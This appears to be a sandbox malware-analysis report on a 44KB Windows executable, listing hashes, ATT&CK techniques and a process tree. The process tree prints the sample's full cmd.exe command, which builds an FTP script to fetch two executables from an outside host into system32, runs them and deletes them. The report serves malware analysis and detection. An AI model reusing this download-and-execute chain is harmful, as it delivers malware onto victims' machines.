e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06/09/2024, 18:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Size

44KB
MD5

d0310b6b7e678c1100131d32fdffdf3b
SHA1

901eabee57673826bdd5aa7f33973ab75831f33b
SHA256

e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee
SHA512

5932d020f1c7cdf18bea240cd92e4159a468591b34fd224fdd9ff77432f0a78f218737496f2d18aed2af3e5b1151f5da357a38939da1ba4377c5d13f2ad7f56d
SSDEEP

768:nomSbguls/uNvGFJw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShI1:no9bfl8AvG/JoeBayDkRace

Score

3^/10

discovery

Malware Config

Signatures

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ftp.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4392	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
4392	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
4392	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4392 wrote to memory of 3728	4392	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	85
PID 4392 wrote to memory of 3728	4392	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	85
PID 4392 wrote to memory of 3728	4392	d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe	85
PID 3728 wrote to memory of 656	3728	Cmd.exe	88
PID 3728 wrote to memory of 656	3728	Cmd.exe	88
PID 3728 wrote to memory of 656	3728	Cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4392
- C:\Windows\SysWOW64\Cmd.exe
  Cmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo get XiaoMing.exe %windir%\system32\Microsoft\XiaoMing.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&%windir%\system32\Microsoft\XiaoMing.exe&Del %windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\XiaoMing.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3728
- - C:\Windows\SysWOW64\ftp.exe
    ftp -s:ftpdate.sys
    3⤵
    - System Location Discovery: System Language Discovery
    PID:656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ftpdate.sys

Filesize
152B

MD5
0fb17816f7c290e13419d68fa258edfa

SHA1
59b9dd4af7fa17ce896b878b55b07ddc4a7936f9

SHA256
bc1cdde48c4f9a1c95233092cc2ab3c33bec604b4164fa5ed4e6eae994fdbb9c

SHA512
5cd2261a9d7d201336a52eb8538d088289ea1161662fc796e47a8da23455218a2a52be004808756645fc59fd19341bd299a82be305f3ce774163192f4a25cc99

Download Submit
memory/4392-21-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download